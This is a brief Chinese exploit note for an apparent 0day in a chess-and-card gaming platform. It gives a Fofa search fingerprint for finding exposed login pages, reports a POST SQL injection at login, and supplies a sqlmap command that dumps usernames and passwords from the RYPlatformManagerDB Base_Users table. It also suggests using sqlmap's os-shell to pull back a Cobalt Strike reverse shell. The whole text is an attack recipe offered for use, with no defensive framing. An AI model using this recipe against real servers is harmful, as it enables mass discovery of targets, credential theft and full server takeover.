棋牌0day_1

Fofa搜索:”/Content/images/login_main.png”

img

登陆处存在POST注入

抓包后丢到sqlmap跑就行了

SqlmapPayload:sqlmap.py -r -D RYPlatformManagerDB -T Base_Users -C Username,Password –dump

也可通过sqlmap的os-shell进行反弹cs